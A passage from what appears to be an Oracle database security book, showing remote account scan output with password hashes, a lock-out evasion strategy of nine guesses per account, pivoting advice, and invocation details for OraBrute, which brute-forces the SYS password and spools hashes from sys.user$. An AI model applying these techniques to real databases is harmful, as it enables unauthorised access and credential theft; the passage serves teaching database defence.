Database Reference
In-Depth Information
TES CB698D7499C02CC7
DBMS_AUD F8206D829322277F
GONG BE18F734A58CB2DF
WATCHER_USER CD2419F94C27BAB6
TEST1 22F2E341BF4B8764
TESTER FC3B58FEE5B77260
MCA 1BE2EC8102224C41
_NEXT_USER
UM 71D1970E8FE9B6C6
UMTEST 321B7FDC90E12193
Finished: (1) users found. (1 secs)
No Oracle listener at 192.168.1.34
No Oracle listener at 192.168.1.35
...output snipped.
orapwshort.csv
in this case is a list of common Oracle username/password combinations. The password hashes
above can then be inputted into a password cracker, as demonstrated in Chapter 10.
It should be noted that most databases will have a lock-out policy of ten attempts on each account, so a common
strategy is to try nine combinations for each account and then move onto the other. It may take a large number of
accounts and servers to find a weak account, but there is usually one. It will commonly be on a development machine.
The skill then is to pivot from that machine to others using the information and trusts that can be garnered from that
development machine that also exist on the target production machines. That pivot process would normally be a case
of running a password cracker against the hashes above. Please see Part III for advanced Oracle password cracking.
The previous code can easily be modified to pull back whatever SQL you would like to pull back by editing this
line in
oralogonsid.pl
$sth = $dbh->prepare( "SELECT name, password from sys.user\$" );
Additional Protection
My previous
Oracle Forensics
book has more detail about penetration testing Oracle databases, but this topic is meant
to be more about protecting Oracle, so I won't duplicate that material here. What I will say is that it is still possible to
break into most Oracle databases due to the lack of SYS password account control. SYS is one of the few accounts we
know will be there, it has no locking, no way to enforce or check password complexity, and prior to 12.1 no failed logon
delay. Therefore, this code will remotely brute-force into most Oracle databases, including the EM12c repository.
OraBrute invocation: orabrute <hostip> <port> <sid> <millitimewait>
e.g. c:\>orabrute 10.1.1.166 1522 orcl 100
When OraBrute creates a file called thepasswordsare.txt then the SYS account password has been
cracked. This program requires the Oracle client, the compiled C code below, the password.txt
password list, as well as selectpassword.sql which contains the following SQL :
--selectpassword.sql:
spool thepasswordsare.txt
select name, password from sys.user$;
/
spool off
exit
